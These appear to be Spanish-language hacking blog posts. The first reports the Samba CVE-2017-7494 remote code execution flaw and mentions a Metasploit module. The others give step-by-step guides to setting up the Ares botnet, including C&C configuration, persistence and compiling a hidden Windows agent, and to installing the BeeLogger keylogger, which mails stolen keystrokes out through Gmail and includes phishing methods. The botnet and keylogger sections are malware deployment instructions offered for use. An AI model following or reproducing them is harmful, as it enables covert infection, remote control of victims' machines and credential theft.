Samba una puerta abierta a los sistemas linux para ataques remotos.

Samba es una implementación libre del protocolo de archivos compartidos de Microsoft Windows.

Ahora bien últimamente solo se ha hablado de las recientes metidas de patas de Microsoft, con las vulnerabilidades que no dejan de salir a la luz de las pantallas de los Ciber-delincuentes, ahora es turno de sistemas Unix y Linux con Samba.

Pero en este caso tenemos el software open-source Samba (Re-implementación del protocolo de red SMB) que corre en la mayoría de los sistemas operativos como Windows, Linux, UNIX, IBM System 390 y OpenVMS.

Una vulnerabilidad critica que tiene 7 años de antigüedad, que permite al atacante tomar control de los sistemas linux y Unix de forma remota.

La vulnerabilidad de ejecución remota de código recién descubierto ( CVE-2.017-7.494 ) afecta a todas las versiones más recientes que Samba 3.5.0 que fue lanzado el 1 de marzo de 2010.

“Todas las versiones de Samba desde 3.5.0 en adelante son vulnerables a una vulnerabilidad de ejecución remota de código, permitiendo que un cliente malicioso para cargar una biblioteca compartida en un recurso compartido de escritura, y luego hacer que el servidor para cargar y ejecutar él,” Samba escribió en un asesor publicado el miércoles.

Según Shodan tendríamos un posible EternaBlue para Linux y Unix?.

De acuerdo con el motor de búsqueda de equipo Shodan, más de 485.000 ordenadores habilitados para Samba expuestos puerto 445 a través de Internet.

Y de acuerdo con los investigadores de Rapid7 , más de 104.000 endpoint expuestas a Internet parecían estar corriendo versiones vulnerables de Samba, de los cuales 92.000 están corriendo versiones no soportadas de Samba.

Ya que Samba es el protocolo SMB implementado en los sistemas Linux y UNIX, por lo que algunos expertos están diciendo que es “versión para Linux de EternalBlue ,” utilizado por el ransomware WannaCry.

Teniendo en cuenta el número de sistemas vulnerables y facilidad de explotar esta vulnerabilidad, podría ser explotado en gran escala con capacidades wormable.
Las redes domésticas con almacenamiento conectado en red (NAS) también podrían ser vulnerables a esta falla.

El código de explotación de lanzamiento! (Bonus: Metasploit Module)

Metasploit-samba

La falla en realidad residía en la forma de Samba maneja bibliotecas compartidas.

Un atacante remoto podría utilizar este módulo arbitrario de la vulnerabilidad Samba para cargar una biblioteca compartida a una parte grabable y luego hacer que el servidor cargue y ejecute el código malicioso.

La vulnerabilidad es super fácil de explotar. Sólo se requiere una línea de código para ejecutar código malicioso en el sistema afectado.

simple.create_pipe ( “/ ruta / a / target.so”)

Sin embargo, el exploit de Samba ya ha sido cargado a Metasploit , un marco de pruebas de penetración, permitiendo a los investigadores, así como los hackers para aprovecharse de este problema fácilmente.

Parche y mitigaciones

Los mantenedores de Samba tiene ya parcheado el tema en sus nuevas versiones y versiones de Samba 4.6.4 / 4.5.10 / 4.4.14 , y están instando a los que utilizan una versión vulnerable de la samba para instalar el parche tan pronto como sea posible.

Pero si no se puede actualizar a las últimas versiones de Samba de inmediato, se puede trabajar en torno a la vulnerabilidad al agregar la siguiente línea al archivo de configuración smb.conf Samba:

nt pipe support = no

Una vez añadido, reinicie el demonio SMB de la red (smbd) y ya está.

Este cambio va a evitar que los clientes accedan plenamente algunas máquinas de la red, así como desactivar algunas funciones que se esperan para los sistemas Windows conectados.

Mientras que los vendedores de distribución de Linux, incluyendo Red Hat y Ubuntu, ya se han publicado versiones parcheadas para sus usuarios.

El riesgo más grande es que parte de los consumidores de dispositivos NAS que podrían no estar actualizada la misma rapidez.

Craig Williams de Cisco, dijo que, dado el hecho de que la mayoría de los dispositivos NAS ejecutan Samba y tienen datos muy valiosos, la vulnerabilidad “tiene potencial para ser el primero a gran escala gusano ransomware para Linux”.

Actualizar:  mantenedores de Samba también han proporcionado los parches para las versiones anteriores y no soportadas de Samba.

Mientras tanto, Netgear publicó un aviso de seguridad de CVE-2.017 hasta 7494, diciendo que un gran número de sus routers y modelos de productos NAS se ven afectados por la falla debido a que utilizan Samba versión 3.5.0 o posterior.

Sin embargo, la compañía actualmente en libertad correcciones de firmware sólo para productos ReadyNAS ejecutan OS 6.x.

Fuente:http://thehackernews.com/

#HackNic – Shadow77

Ares y no hablamos de descargas P2P, hablamos de Botnet.

Una Botnet no es nada más que muchas computadoras infectadas que responden a un C&C (Command and Control server).

Usos habituales de las botnets

Estas redes son usadas en general para generar dinero a través de usos que generan dinero a sus controladores. Entre los usos más comunes están:

  • Ataques de denegación de servicio distribuidos (DDoS)
  • Envío de Spam
  • Minería de Bitcoins
  • Robo de Bitcoins

Ahora ARES BOTNET:

Ares es una herramienta de acceso remoto compuesta por un panel de control donde podremos interaccionar con los bots.
El cliente es un programa escrito en python el cual puede ser compilado como un ejecutable win32 usando PyInstaller.

Instalación:

  • Clonamos el Repositorio:
git clone https://github.com/sweetsoftware/Ares.git
  • Una vez descargado el repositorio pasaremos a instalar las dependencias:
pip install pythoncom 
pip install pyhook 
pip install PIL 
pip install requests
A continuación configuraremos el agente de la manera que queramos, settings.py
Nos dirigimos a la ruta Ares/agent/python/settings.py

Este fichero contiene lo siguiente:

-SERVER_URL = URL del servidor http 
-BOT_ID = el nombre (singular) del bot
-DEBUG =  imprimir mensajes de depuración en la salida estándar
-Idle_time = tiempo de inactividad antes de entrar en el modo de espera.
-REQUEST_INTERVAL = intervalo entre cada consulta a la CNC cuando se activa
-PAUSE_AT_START = tiempo de espera antes de contactar con el servidor cuando se inicie (en segundos)
-AUTO_PERSIST = por defecto el agente es persistente

fichero de configuración del server

Una vez todo en orden pasaremos a instalar el server:

  • primero debemos crear la base de datos SQLite

cd server
python db_init.py

  • Si no esta instalado el paquete cherrypy deberemos instalarlo
pip install cherrypy
  • Bien, a continuacion iniciaremos el server,
 python server.py

Por defecto el servidor escucha en http://localhost:8080

  • Por último utilizaremos PyInstaller para compilar el agente en un único archivo EXE:
cd agent
PyInstaller --onefile --noconsole agent.py

Recuerden que deberemos iniciar el server y la bbdd antes de lanzar el script.

Aquí deberemos establecer un pass para el Panel de Control

 

Mediante el fichero agent.py conseguiremos el bot, yo lo que he hecho ha sido ejecutarlo desde la consola

Bot list

 

Nos da una Shell no es muy llamativa pero es funcional

 

Fuente: https://github.com/sweetsoftware/Ares

#HackNic – Shadow77

BeeLogger -porque todos necesitamos un Keylogger

Todo el mundo ama los Keylogger a no ser que lo usen contra ti.

Un Keylogger no es más que un programa que registra las pulsaciones de nuestro teclado y guarda un registro de ello, en términos simples si estas infectado con un Keylogger deberias de cambiar tus passwords.

Esta vez traigo un Keylogger creado por Alisson Moretto4w4k3 que nos va a permitir una sencilla configuracion y personalizacion de manera rápida y lista para implementar.

El Keylogger envía los registros usando una cuenta de Gmail, por lo cual debemos activar el uso de aplicaciones menos seguras en la configuración de la cuenta:

 https://myaccount.google.com/lesssecureapps

Prerrequisitos:

  • apt
  • wine
  • wget
  • Linux
  • sudo
  • python 2.7
  • python 2.7 on Wine Machine
  • pywin32 on Wine Machine
  • pythoncom on Wine Machine

Características:

  • Enviar registros de cada 120 segundos.
  • Enviar registros cuando los caracteres > 50.
  • Enviar registros con GMAIL.
  • Se incluyen algunos métodos de phishing.
  • Sesión múltiples deshabilitado.
  • Auto Persistencia

Instalación:


Cloning:

git clone https://github.com/4w4k3/BeeLogger.git
cd BeeLogger
sudo su
chmod +x install.sh
./install.sh
python bee.py

Si tienes otra versión de Python:

python2.7 bee.py

Fuente: https://github.com/4w4k3/BeeLogger

#HackNic – Shadow77